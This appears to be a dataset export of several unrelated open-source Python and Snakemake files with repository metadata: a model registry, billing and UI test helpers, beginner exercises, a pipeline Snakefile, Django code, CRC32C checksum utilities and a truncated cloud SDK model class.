if self.default_clk_name != "sb_hfosc":
GenericPlatform.do_finalize(self, f, *args, **kwargs)
if self.default_clk_name == "sb_hfosc":
self.default_clk_period = 48
| [
"[email protected]"
] | |
d84ff8f2c78aba9a9b9af85e7fa3a9b9e16bab5c | 3ea9509a26e59fafc4f53d4c5cf82cf1c600c2dc | /nn/registry.py | 087c86b1fec4023f905a9b9be17f8b60f5d60428 | [
"Apache-2.0"
] | permissive | mgilgamesh/grl | 696230afe03d8332909452941c5d36cf23bd734c | 7d42bb2e78bc3e7b7c3ebbcf356a4d1cf12abebf | refs/heads/master | 2023-08-30T23:10:39.439264 | 2021-10-31T04:17:06 | 2021-10-31T04:17:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 925 | py | import functools
from nn.utils import Dummy
class Registry:
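    """Minimal name-to-object registry.
    Maps string keys to registered classes/functions; `None` resolves to the
    `Dummy` placeholder, and `get` passes non-string arguments through
    unchanged.
    """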
    def __init__(self, name):
        self.name = name
        self._mapping = {None: Dummy}
def register(self, name):
def _thunk(func):
self._mapping[name] = func
return func
return _thunk
def get(self, name):
if isinstance(name, str) or name is None:
return self._mapping[name]
return name
def contain(self, name):
return name in self._mapping
def get_all(self):
return self._mapping
layer_registry = Registry(name='layer')
am_registry = Registry(name='am') # convolutional attention modules
block_registry = Registry(name='block')
subsample_registry = Registry(name='subsample')
cnn_registry = Registry(name='cnn')
def register_all(registry, globs):
for k, v in globs.items():
if isinstance(v, functools.partial):
registry.register(k)(v)
| [
"[email protected]"
] | |
5b44eb7cc37bf636603b548625f23fcca036ddc4 | 3d705ec48c94373817e5f61d3f839988910431e3 | /lib/interface/boss/bill_handler.py | 5bcbc1c4db585f80edef42bb49152c62ff1591ea | [] | no_license | namesuqi/zeus | 937d3a6849523ae931162cd02c5a09b7e37ebdd8 | 3445b59b29854b70f25da2950016f135aa2a5204 | refs/heads/master | 2022-07-24T14:42:28.600288 | 2018-03-29T08:03:09 | 2018-03-29T08:03:09 | 127,256,973 | 0 | 0 | null | 2022-07-07T22:57:57 | 2018-03-29T07:53:16 | Python | UTF-8 | Python | false | false | 6,514 | py | # coding=utf-8
"""
boss系统-计费模块 自动化用例相关的脚本
__author__ = 'liwenxuan'
20170605
"""
import time
from random import choice
from lib.database.pykafka_handler import pykafka_producer, pykafka_consumer
from lib.interface.boss.time_handler import get_second_to_int
from lib.database.mysql_db_v2 import MysqlDB
from lib.interface.boss.environment_constant import BOSS_CRM_HOST
def send_billing_logs_to_kafka(kafka_hosts, schema_host, schema_port, topic, logs_list, consumer_group):
"""
    Write logs directly to Kafka and verify that all written logs can be consumed back from Kafka.
    :param kafka_hosts: hosts of the Kafka cluster, e.g. "192.168.1.230:9092,192.168.1.232:9092,192.168.1.191:9092,192.168.1.189:9092"
    :param schema_host: host of the schema service, e.g. "192.168.1.230"
    :param schema_port: port of the schema service, e.g. 8081
    :param topic: topic of the logs, e.g. "test_b_download_flow"
    :param logs_list: logs to write, e.g. [{k1: v1, k2: v2, ...}, ...]
    :param consumer_group: consumer group for the logs, e.g. "boss_bill_daily_test"
:return:
"""
pykafka_consumer(kafka_hosts, schema_host, schema_port, topic, consumer_group)
time.sleep(1)
pykafka_producer(kafka_hosts, schema_host, schema_port, logs_list, topic, write_time=-7)
time.sleep(5)
actual_logs_count = len(pykafka_consumer(kafka_hosts, schema_host, schema_port, topic, consumer_group))
if actual_logs_count == len(logs_list):
return True
else:
print "total", len(logs_list), "logs, receive", actual_logs_count, "logs"
return False
def create_download_logs_list(block_count, logs_count, prefix, ts_second, domain_list):
"""
    Build the list of download logs.
    :param block_count: number of blocks, where a batch of logs counts as one block (not the BOSS "block" concept)
    :param logs_count: number of logs contained in one block
    :param prefix: prefix of the logs' peer_id
    :param ts_second: timestamp of the logs (in seconds)
    :param domain_list: candidate domains for the logs' url
:return:
"""
log_list = []
for i in range(block_count):
flow = 1000000 + i * 10240
        log_id_prefix = get_second_to_int()  # first 8 chars of the 16-char log id: the date (day) and time (h/m/s) the log was sent
for j in range(logs_count):
log_id = str(log_id_prefix) + str(j).rjust(8, "F")
peer_id = str(prefix).zfill(8) + "FFFFFFFF" + log_id
url = "http://{0}/".format(choice(domain_list))
timestamp = (int(ts_second) - choice(range(0, 301))) * 1000 - choice(range(0, 1000))
log = {"id": log_id, "timestamp": timestamp, "peer_id": peer_id, "url": url, "play_type": "live",
"vvid": "boss_daily_test", "duration": 60, "app": flow, "cdn": flow*3, "p2p": flow*4,
"public_ip": "192.168.0.0", "sdk_agent_name": "boss_daily_test", "sdk_agent_version": "3.11.0"}
log_list.append(log)
return log_list
def create_upload_logs_list(block_count, logs_count, prefix, ts_second):
"""
    Build the list of upload logs.
    :param block_count: number of blocks, where a batch of logs counts as one block (not the BOSS "block" concept)
    :param logs_count: number of logs contained in one block
    :param prefix: prefix of the logs' peer_id
    :param ts_second: timestamp of the logs (in seconds)
:return:
"""
log_list = []
for i in range(block_count):
flow = 1000000 + i * 10240
        log_id_prefix = get_second_to_int()  # first 8 chars of the 16-char log id: the date (day) and time (h/m/s) the log was sent
for j in range(logs_count):
log_id = str(log_id_prefix) + str(j).rjust(8, "F")
peer_id = str(prefix).zfill(8) + "FFFFFFFF" + log_id
timestamp = (int(ts_second) - choice(range(0, 301))) * 1000 - choice(range(0, 1000))
log = {"id": log_id, "timestamp": timestamp, "peer_id": peer_id, "play_type": "live", "duration": 60,
"upload": flow, "public_ip": "192.168.0.0"}
log_list.append(log)
return log_list
def compare_results_for_billing(block_count, logs_count, prefix, ts_second, category, price, unit):
"""
    Check whether the actual results match the expected results.
    :param block_count: number of blocks, where a batch of logs counts as one block (not the BOSS "block" concept)
    :param logs_count: number of logs contained in one block
    :param prefix: prefix of the logs' peer_id
    :param ts_second: timestamp of the logs (in seconds)
    :param category: billing category, "download"/"upload"
    :param price: unit price configured in CRM
    :param unit: pricing unit configured in CRM, "KB"/"MB"/"GB"
:return:
"""
assert unit in ("KB", "MB", "GB")
account = 0
for i in range(logs_count):
flow = 1000000 + i * 10240
account += flow
print "account one block:", account
total_account = account * block_count
print "account all block:", total_account
total_money = total_account * price
print "money (B):", total_money
if unit == "KB":
expect_account = float(total_account)/1024
expect_money = float(total_money)/1024
elif unit == "MB":
expect_account = float(total_account)/1024/1024
expect_money = float(total_money)/1024/1024
else:
expect_account = float(total_account)/1024/1024/1024
expect_money = float(total_money)/1024/1024/1024
timestamp_end = int(ts_second)
timestamp_start = timestamp_end - 10 * 60
sql = "select sum(account), sum(money) from {0}_billing where ts between {1} and {2} and prefix = '{3}'"\
.format(category, timestamp_start, timestamp_end, prefix)
mysql_db = MysqlDB(host=BOSS_CRM_HOST)
actual_account, actual_money = mysql_db.execute(sql).one_by_one()
del mysql_db
if abs(actual_account - expect_account) <= 0.000001 and abs(actual_money - expect_money) <= 0.000001:
return True
else:
print "account - expect:", expect_account, "; actual:", actual_account
print "money - expect:", expect_money, "; actual:", actual_money
return False
def clear_logs(customer_id, category):
    # To keep data accumulated by automated tests from filling up the BOSS automation server, purge the stale logs after every test run.
ts_millisecond = (int(time.time()) - 86400 * 5) * 1000
sql = "delete from {0}_log_{1} where timestamp <= {2}".format(category, customer_id, ts_millisecond)
mysql_db = MysqlDB(host=BOSS_CRM_HOST)
mysql_db.execute(sql)
time.sleep(1)
del mysql_db
| [
"[email protected]"
] | |
36760485f3ba83fc51a32e232824579aa64e26b2 | 1b0649a5ad50e4b80506d5b4de52a9c0eff22123 | /Lecture04_List_And_Loops/Exercises/rental_car.py | 3fab1daa16ed383a50e10bdd37254de97bcde382 | [] | no_license | duochen/Python-Kids | abeee3935fd80d5f157e7e0775f889c71485ae58 | c2982a5f7581a974b91941c7faeea32e92ee9644 | refs/heads/master | 2020-06-04T21:53:11.865952 | 2019-09-07T01:05:22 | 2019-09-07T01:05:22 | 192,205,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | car = input("What kind of rental car would you like? ")
print(f"Let me check if I can find you a {car}") | [
"[email protected]"
] | |
b200321ee970c90457fd032ce4f154c60390b3fe | 37a70c38e59a8c9098725e8999998ee5aa57f54c | /features/steps/index_page_user_holidays&books.py | 5f5544493a2ccc867641a2f346a9438d0dcfa203 | [] | no_license | A-Zorg/msw_front | 38c0da655104c070a9da07b1a329c7ea7c2dcba3 | 73ac1df709e3b9001c117c1bb9d81c9dee39971b | refs/heads/master | 2023-07-06T20:19:39.439660 | 2021-08-13T16:39:46 | 2021-08-13T16:39:46 | 338,313,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,465 | py | from behave import *
from base.service_functions import check_image, refine_holidays, \
mysql_select, pgsql_del, pgsql_select, remove_spaces
import configparser
from base64 import b64decode
import time
import random
import datetime
config = configparser.ConfigParser()
config.read("config/config.ini")
selectors = configparser.ConfigParser()
selectors.read("config/selectors.ini")
"""------------------------------------------Holidays------------------------------------------------------"""
@step("get next 5 holidays")
def step_impl(context):
context.holidays = refine_holidays(config['holidays_api'])
@step("compare actual holidays name_list with expected")
def step_impl(context):
holidays = context.holidays
for i in range(len(holidays)):
name_expected = str(holidays[i][0])
selelector_list = eval(selectors['index_page_holidays']['name'])
selector = selelector_list[0].format(i + 2)
name_actual = context.driver.get_atribute(selector=selector)
assert name_actual == name_expected
@step("compare actual holidays date_list with expected")
def step_impl(context):
holidays = context.holidays
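    # converts the on-page 'DD.MM.YYYY' date into ISO 'YYYY-MM-DD' for comparison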
formating = lambda part: '-'.join(part.split('.')[::-1])
for i in range(len(holidays)):
date_expected = str(holidays[i][1])
selelector_list = eval(selectors['index_page_holidays']['date'])
selector = selelector_list[0].format(i+2)
date_actual = context.driver.get_atribute(selector=selector)
date_actual = formating(date_actual)
assert date_actual == date_expected
"""-----------------------------------SERV and COMP-------------------------------------------------------"""
@step("check sevices field")
def step_impl(context):
service = eval(selectors['index_page_serv&comp']['serv_name'])
result_1 = context.driver.check_el_text('SERV', *service)
service_amount = eval(selectors['index_page_serv&comp']['serv_amount'])
result_2 = context.driver.check_el_text("-100", *service_amount)
assert result_1==result_2==True
# with open('C:\\Users\\wsu\\Desktop\\xxx.txt', 'a') as file:
# file.write(str(result_2) + '\n')
# with open('C:\\Users\\wsu\\Desktop\\xxx.txt', 'a') as file:
# file.write(str(result_1) + '\n')
@step("check compensations field")
def step_impl(context):
compensation = eval(selectors['index_page_serv&comp']['comp_name'])
result_1 = context.driver.check_el_text('COMP', *compensation)
compensation_amount = eval(selectors['index_page_serv&comp']['comp_amount'])
result_2 = context.driver.check_el_text("200", *compensation_amount)
assert result_1 == result_2 == True
@step("check total")
def step_impl(context):
total = eval(selectors['index_page_serv&comp']['total'])
result = context.driver.check_el_text('100', *total)
assert result == True
"""---------------------------------------BOOKS------------------------------------------------"""
@step("make general select of books")
def step_impl(context):
sel = "SELECT b.name, b.author, s.title, s.id FROM books as b JOIN sub_sections as s ON b.sub_section_id=s.id "
db = config['mysql_db']
context.general_select = mysql_select(sel, **db)
@step("get all genres")
def step_impl(context):
genres=set()
for book in context.general_select:
genres.add(book[2])
context.genres = genres
@step("choose category on the Index page")
def step_impl(context):
genre_list = list(context.genres)
context.random_category = random.choice(genre_list)
context.driver.visibility_of_element(*eval(selectors['index_page_books']['marker']))
context.driver.click_with_wait(*eval(selectors['index_page_books']['category']))
context.driver.click_element_in_list(context.random_category, *eval(selectors['index_page_books']['category_item']))
@step("make select with chosen {typo}")
def step_impl(context, typo):
if typo == 'category':
sel = f"SELECT b.name, b.author, s.title, s.id FROM books as b " \
f"JOIN sub_sections as s ON b.sub_section_id=s.id " \
f"WHERE s.title = '{context.random_category}'"
elif typo == 'search_text':
sel = f"SELECT b.name, b.author, s.title, s.id " \
f"FROM books as b JOIN sub_sections as s ON b.sub_section_id=s.id " \
f"WHERE b.name LIKE '%{context.search_text}%' OR b.author LIKE '%{context.search_text}%'"
db = config['mysql_db']
category_select = mysql_select(sel, **db)
context.result=[]
for book in category_select:
context.result.append(str(book[1]+' '+book[0]).upper())
@step("check selected books on the index page")
def step_impl(context):
time.sleep(3)
els = context.driver.get_elements(*eval(selectors['index_page_books']['book']))
for el in els:
el.location_once_scrolled_into_view
if el.text not in context.result:
assert False
assert True
"""--------------------------"""
@step("get some search random phrase")
def step_impl(context):
book_names=set()
for book in context.general_select:
book_names.add(book[0])
book_names.add(book[1])
search_text = random.choice(list(book_names))
context.search_text = search_text[1:-1]
@step("perform search by the random phrase")
def step_impl(context):
context.driver.visibility_of_element(*eval(selectors['index_page_books']['marker']))
context.driver.input_text(context.search_text, *eval(selectors['index_page_books']['search_field']))
context.driver.click_with_wait(*eval(selectors['index_page_books']['search_button']))
"""----------------------------------------------LIKES-------------------------------------------"""
@step("get {typo} number of likes")
def step_impl(context, typo):
amount_like = context.driver.get_atribute(*eval(selectors['index_page_news']['outer_like_amount']))
if typo == 'initial':
context.initial_like = amount_like
elif typo == 'intermediate':
context.intermediate_like = amount_like
@step("click the like button from {locus} page")
def step_impl(context, locus):
if locus == 'index':
selector = eval(selectors['index_page_news']['outer_like_button'])
elif locus == 'news':
selector = eval(selectors['index_page_news']['inner_like_button'])
context.driver.click_with_wait(*selector)
@step("open news")
def step_impl(context):
context.driver.click_with_wait(*eval(selectors['index_page_news']['news_block']))
@step("compare number of likes with {typo} number")
def step_impl(context, typo):
amount_like = context.driver.get_atribute(*eval(selectors['index_page_news']['inner_like_amount']))
if typo == 'initial':
initial_like = amount_like
assert initial_like == context.initial_like
elif typo == 'intermediate':
intermediate_like = amount_like
assert intermediate_like == context.intermediate_like
@step("Exit the news block")
def step_impl(context):
context.driver.click_by_coordinates(0, 0)
"""-------------------------------------------VIEWS---------------------------------------------"""
@step("delete all views")
def step_impl(context):
sel = "DELETE FROM index_postview"
db = config['pg_db']
pgsql_del(sel, **db)
@step("get initial number of views")
def step_impl(context):
context.initial_views = context.driver.get_atribute(*eval(selectors['index_page_news']['outer_view_amount']))
@step("compare number of views with initial number")
def step_impl(context):
amount_view = context.driver.get_atribute(*eval(selectors['index_page_news']['inner_view_amount']))
assert int(amount_view) == int(context.initial_views)+1
"""-------------------------------------------NEWS TEXT----------------------------------------------"""
@step("get news from db")
def step_impl(context):
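    # data_formater turns a 'YYYY-MM-DD' date into the UI's 'DD.MM.YY' format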
data_formater = lambda x: '.'.join([part[-2] + part[-1] for part in x.split('-')[::-1]])
sel = "SELECT * FROM index_news"
db = config['pg_db']
news = pgsql_select(sel, **db)
context.news=[]
for row in news:
d = data_formater(str(row[4].date()))
h_m = str(row[4].time())[0:5]
context.news.append(remove_spaces(row[1]+row[2]) + h_m + d)
# with open('C:\\Users\\wsu\\Desktop\\xxx.txt', 'a', encoding='utf-8') as file:
# file.write(str(context.news) + '\n')
@step("take text_news from {typo} page")
def step_impl(context, typo):
time.sleep(3)
if typo == 'index':
prefix = 'outer'
elif typo == 'news':
prefix = 'inner'
text = context.driver.get_atribute(*eval(selectors['index_page_news'][f'{prefix}_text']))
headline = context.driver.get_atribute(*eval(selectors['index_page_news'][f'{prefix}_headline']))
datum = context.driver.get_atribute(*eval(selectors['index_page_news'][f'{prefix}_datetime']))
if typo == 'index':
context.outer_result = remove_spaces(text) + remove_spaces(headline)+remove_spaces(datum)
elif typo == 'news':
context.inner_result = remove_spaces(text) + remove_spaces(headline)+remove_spaces(datum)
@step("compare news from index_page and news_page")
def step_impl(context):
assert context.outer_result == context.inner_result
@step("check that all news are shown on index page")
def step_impl(context):
for i in range(len(context.news)):
time.sleep(2)
headline_selector = selectors['index_page_news']['universal'].format(i+1, 1, '')
text_selector = selectors['index_page_news']['universal'].format(i+1, 2, '')
datum_selector = selectors['index_page_news']['universal'].format(i+1, 3, '/div[3]')
context.driver.show_element(headline_selector)
headline = context.driver.get_atribute(headline_selector)
text = context.driver.get_atribute(text_selector)
datum = context.driver.get_atribute(datum_selector)
result = remove_spaces(headline) + remove_spaces(text)+remove_spaces(datum)
if result in context.news:
context.news.remove(result)
else:
assert False
"""------------------------------NEWS IMAGE----------------------------"""
@step("get news from db(image)")
def step_impl(context):
sel = "SELECT id, title FROM index_news"
db = config['pg_db']
context.news = pgsql_select(sel, **db)
@step("get the id of the news being checked")
def step_impl(context):
headline_selector = selectors['index_page_news']['universal'].format(1, 1, '')
headline = context.driver.get_atribute(headline_selector)
for row in context.news:
if row[1] == headline:
context.id_news = row[0]
break
assert context.id_news
@step("get image from api")
def step_impl(context):
url = context.host+'/api/media/news/'+str(context.id_news)
response = context.admin_session.get(url)
with open('files/image_news_api.png', 'bw') as file:
file.write(response.content)
@step("make screenshot of the news_image")
def step_impl(context):
element = eval(selectors['index_page_news']['news_image'])
context.driver.screenshot_of_element('image_news_msw', *element)
context.driver.click_by_coordinates(0, 0)
@step("compare news_images")
def step_impl(context):
path_1 = "files/image_news_api.png"
path_2 = "files/image_news_msw.png"
assert check_image(path_1, path_2)
"""-------------------------------------------------------------------------------"""
| [
"[email protected]"
] | |
57a53454f6247d419b233ade15faf301089c4935 | c94a678a2b78907d79bfdbde2a0f19f345d5d68c | /code/week03/two_level_menu.py | e03ffd4315bd6fb842bf1a80b7ce673bf4c09a25 | [] | no_license | Heroes-Academy/IntroPython_Winter2017 | 7f26c009e2d2706128f2fc7ad906e95b4c7324c2 | fdf467fa95b3d0708d40711dfcc9c734c9dd1226 | refs/heads/master | 2021-01-13T03:53:20.238013 | 2017-03-12T15:21:38 | 2017-03-12T15:21:38 | 78,315,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 587 | py | print("My firt menu")
print("1. Hear a joke")
menu_choice = # get the selection
if # put the condition in here#
print("Do you want a rabbit joke or science joke?")
next_menu_choice = # get the next selection
if next_menu_choice == "rabbit":
print("What do you call a happy rabbit?")
print("A hop-timist!")
elif ### put the condition for science here:
print("What did the receiver say to the radio wave?")
print("Ouch! That megahertz!")
else:
print("I don't have that joke")
else:
print("I don't have that menu option!")
| [
"[email protected]"
] | |
6c3b088984d81299af5aed927b416186025fa04c | eda678c6158431430fa195fd5d51c424293fc724 | /experiments/subvariant_transfer/Snakefile | de29e27ae35c8a0f3a52d11fb6d2e2853a241462 | [] | no_license | ohsu-comp-bio/dryads-research | 8e75ecf812aa3c5139cffacf43116772d6a36376 | c5c4b9e3c5e4ae5820b1dcfa669abf222e85d0db | refs/heads/master | 2023-04-12T20:55:52.147569 | 2021-08-14T21:36:57 | 2021-08-14T21:36:57 | 139,887,441 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,196 |
import os
LOCALDIR = os.path.join(os.environ['CODEDIR'],
'HetMan', 'experiments', 'subvariant_transfer')
TMPDIR = os.path.join(os.environ['TEMPDIR'],
'HetMan', 'subvariant_transfer',
"{}__samps-{}".format(config['cohorts'],
config['samp_cutoff']),
config['mut_levels'],
"{}_{}".format(config['classif'], config['ex_mtype']))
OUTDIR = os.path.join(os.environ['DATADIR'], 'HetMan', 'subvariant_transfer',
"{}__samps-{}".format(config['cohorts'],
config['samp_cutoff']))
localrules: target, consolidate
rule target:
input:
expand("{outdir}/out-data__{mut_levels}_{classif}_{ex_mtype}.p",
outdir=OUTDIR, mut_levels=config['mut_levels'],
classif=config['classif'], ex_mtype=config['ex_mtype'])
threads: 1
rule transfer:
output: "{TMPDIR}/output/out_task-{task_id}.p"
threads: 12
shell: """
set +u; source activate HetMan; set -u;
export OMP_NUM_THREADS=1;
sleep $(( ({wildcards.task_id} + 1) * $(shuf -i 1-13 -n 1) ));
python {LOCALDIR}/fit_transfer.py \
{config[classif]} {config[ex_mtype]} \
--use_dir={TMPDIR} --task_count={config[task_count]} \
--task_id={wildcards.task_id}
"""
rule consolidate:
input:
expand("{tmpdir}/output/out_task-{task_id}.p",
tmpdir=TMPDIR, task_id=range(config['task_count']))
output:
expand("{outdir}/out-data__{mut_levels}_{classif}_{ex_mtype}.p",
outdir=OUTDIR, mut_levels=config['mut_levels'],
classif=config['classif'], ex_mtype=config['ex_mtype'])
threads: 1
shell: """
set +u; source activate HetMan; set -u;
python {LOCALDIR}/merge_transfer.py {TMPDIR}
out_tag={config[mut_levels]}_{config[classif]}_{config[ex_mtype]}
cp {TMPDIR}/out-data.p {OUTDIR}/out-data__${{out_tag}}.p
cp {TMPDIR}/setup/cohort-data.p {OUTDIR}/cohort-data__${{out_tag}}.p
"""
| [
"[email protected]"
] | ||
96ee7dbb079ed5aff687ac0b049615f1919675e7 | 3d8838dab84f880a9131994608c146c032eaaa6f | /uevents/views.py | ff56af7d1111b36e4ef3a3c1ec4a29826f35ed93 | [] | no_license | sergiosalonso/uevents | 9f69c0d09a51216b3de67b37d5b2901557a32157 | 94d5adb36488194657c65817dc8ba45b16ce416a | refs/heads/master | 2022-05-07T22:08:10.155075 | 2019-05-07T09:08:48 | 2019-05-07T09:08:48 | 185,363,746 | 0 | 0 | null | 2022-04-22T21:13:03 | 2019-05-07T09:02:57 | Python | UTF-8 | Python | false | false | 253 | py | from django.views.generic import TemplateView
class IndexView(TemplateView):
template_name='index.html'
class LogOutView(TemplateView):
template_name='success_logout.html'
class LogInView(TemplateView):
template_name='success_login.html'
| [
"[email protected]"
] | |
30c0310b3a8e60252424745a39a32a7ea679b905 | 2c9b77d91f1ba7ece443711c8c9c7280732b07fe | /time_trial_gui/lib/racer_driver/echo_trial_job.py | a4672c7d5f55994814ec380c55f7755607ad3925 | [
"MIT"
] | permissive | andresriancho/time_trial | d68c06dfc7fa2fc6c396b6e813d8df23ad068f76 | d7a23dae0bc4e2ecb3eb1ea0f4a94e21861571cc | refs/heads/master | 2021-01-18T02:34:46.045593 | 2015-10-30T16:46:38 | 2015-10-30T16:46:38 | 45,219,305 | 0 | 1 | null | 2015-10-30T00:33:01 | 2015-10-30T00:33:00 | null | UTF-8 | Python | false | false | 524 | py | import subprocess
CPP_ECHO_TIMING_EXECUTABLE = "../racer/bin/run_timing_client"
def run_echo_trial_job(trial):
print("Executing Echo Trial...")
#TODO: get this from a config file
cmd = []
cmd.append(CPP_ECHO_TIMING_EXECUTABLE)
cmd.append(trial.target_host)
cmd.append(str(trial.target_port))
cmd.append(str(int(trial.real_time)))
cmd.append(str(trial.core_affinity))
cmd.append(str(trial.delay))
cmd.append(str(trial.reps))
print(cmd)
return subprocess.check_output(cmd)
| [
"[email protected]"
] | |
9cfc1c903389414320a80047a53517d24b5020bd | 283bbf2ce575ea72010e9823907285b08d20fce4 | /breathecode/authenticate/migrations/0001_initial.py | 401599c5ba55399253edb86f4edba14a5ef0a547 | [] | no_license | AnMora/apiv2 | c084ffcb4ff5b7a0a01dac8fca26f4f4c37aad97 | fa3b3f0ce4a069facdecd18e133c7b4222a0004a | refs/heads/master | 2023-05-19T23:00:34.257230 | 2021-06-08T21:17:56 | 2021-06-08T21:17:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,355 | py | # Generated by Django 3.0.7 on 2020-06-16 06:25
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='CredentialsGithub',
fields=[
('github_id', models.IntegerField(primary_key=True, serialize=False)),
('token', models.CharField(max_length=255)),
('email', models.CharField(max_length=150, unique=True)),
('avatar_url', models.CharField(max_length=255)),
('name', models.CharField(max_length=150)),
('blog', models.CharField(max_length=150)),
('bio', models.CharField(max_length=255)),
('company', models.CharField(max_length=150)),
('twitter_username', models.CharField(blank=True, max_length=50, null=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('user', models.OneToOneField(blank=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
3c228e9863635cdf5f5389d7f9a128c741ce52bc | c934e7c27f0e72385218a14b4e2a7e94a747a360 | /google-cloud-sdk/lib/googlecloudsdk/command_lib/util/crc32c.py | 42382ea1e774df38f8d3f3912594d1f689df477a | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | PrateekKhatri/gcloud_cli | 5f74b97494df4f61816026af9460b9c4d8e89431 | 849d09dd7863efecbdf4072a504e1554e119f6ae | refs/heads/master | 2023-03-27T05:53:53.796695 | 2021-03-10T04:08:14 | 2021-03-10T04:08:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,121 | py | # -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helpers for calculating CRC32C checksums."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import base64
import six
# pylint: disable=g-import-not-at-top
try:
# TODO(b/175725675) Make google_crc32c available with Cloud SDK.
import google_crc32c
IS_GOOGLE_CRC32C_AVAILABLE = True
except ImportError:
import gcloud_crcmod as crcmod
IS_GOOGLE_CRC32C_AVAILABLE = False
print('using crcmod')
# pylint: enable=g-import-not-at-top
def get_crc32c():
"""Returns an instance of Hashlib-like helper for CRC32C operations.
Returns:
The google_crc32c.Checksum instance
if google-crc32c (https://github.com/googleapis/python-crc32c) is
available. If not, returns the predefined.Crc instance from crcmod library.
Usage:
# Get the instance.
crc = get_crc32c()
# Update the instance with data. If your data is available in chunks,
# you can update each chunk so that you don't have to keep everything in
# memory.
for chunk in chunks:
crc.update(data)
# Get the digest.
crc_digest = crc.digest()
"""
if IS_GOOGLE_CRC32C_AVAILABLE:
return google_crc32c.Checksum()
return crcmod.predefined.Crc('crc-32c')
def get_crc32c_checksum(data):
"""Calculates the CRC32C checksum of the provided data.
Args:
data (bytes): The bytes over which the checksum should be calculated.
Returns:
An int representing the CRC32C checksum of the provided bytes.
"""
crc = get_crc32c()
crc.update(six.ensure_binary(data))
return int(crc.hexdigest(), 16)
def get_crc32c_hash(data):
"""Calculates the CRC32C hash for the provided data.
This returns the base64 encoded version of the CRC32C digest, which is handy
for GCS objects which store the CRC32C Hash in this format.
Args:
data (bytes): Bytes over which the hash should be calculated.
Returns:
    A string representing the base64 encoded CRC32C hash.
"""
crc = get_crc32c()
crc.update(six.ensure_binary(data))
return base64.b64encode(crc.digest()).decode('ascii')
def does_crc32c_checksum_match(data, data_crc32c_checksum):
"""Checks if checksum for the data matches the supplied checksum.
Args:
data (bytes): Bytes over which the checksum should be calculated.
data_crc32c_checksum (int): Checksum against which data's checksum will be
compared.
Returns:
True iff both checksums match.
"""
return get_crc32c_checksum(data) == data_crc32c_checksum
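# Example usage (illustrative sketch; the byte string below is arbitrary sample data):
if __name__ == '__main__':
  sample_data = b'hello, checksum'
  checksum = get_crc32c_checksum(sample_data)
  print('crc32c checksum (int):', checksum)
  print('crc32c hash (base64):', get_crc32c_hash(sample_data))
  print('checksums match:', does_crc32c_checksum_match(sample_data, checksum))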
| [
"[email protected]"
] | |
eadc5422a39457611dd5e83a0283a5b1f65b9fe1 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-apig/huaweicloudsdkapig/v2/model/app_code_base_info.py | 306617ad18fd84a8907b99a86bf0874ecf9207a2 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 5,356 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class AppCodeBaseInfo:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'app_code': 'str',
'id': 'str',
'app_id': 'str',
'create_time': 'str'
}
attribute_map = {
'app_code': 'app_code',
'id': 'id',
'app_id': 'app_id',
'create_time': 'create_time'
}
def __init__(self, app_code=None, id=None, app_id=None, create_time=None):
"""AppCodeBaseInfo
The model defined in huaweicloud sdk
        :param app_code: App Code value. Letters and the characters +_!@#$%+/= are supported; the value must start with a letter, + or /, and be 64 to 180 characters long.
        :type app_code: str
        :param id: ID
        :type id: str
        :param app_id: Application ID
        :type app_id: str
        :param create_time: Creation time
:type create_time: str
"""
self._app_code = None
self._id = None
self._app_id = None
self._create_time = None
self.discriminator = None
self.app_code = app_code
if id is not None:
self.id = id
if app_id is not None:
self.app_id = app_id
if create_time is not None:
self.create_time = create_time
@property
def app_code(self):
"""Gets the app_code of this AppCodeBaseInfo.
        App Code value. Letters and the characters +_!@#$%+/= are supported; the value must start with a letter, + or /, and be 64 to 180 characters long.
:return: The app_code of this AppCodeBaseInfo.
:rtype: str
"""
return self._app_code
@app_code.setter
def app_code(self, app_code):
"""Sets the app_code of this AppCodeBaseInfo.
        App Code value. Letters and the characters +_!@#$%+/= are supported; the value must start with a letter, + or /, and be 64 to 180 characters long.
:param app_code: The app_code of this AppCodeBaseInfo.
:type app_code: str
"""
self._app_code = app_code
@property
def id(self):
"""Gets the id of this AppCodeBaseInfo.
        ID
:return: The id of this AppCodeBaseInfo.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this AppCodeBaseInfo.
        ID
:param id: The id of this AppCodeBaseInfo.
:type id: str
"""
self._id = id
@property
def app_id(self):
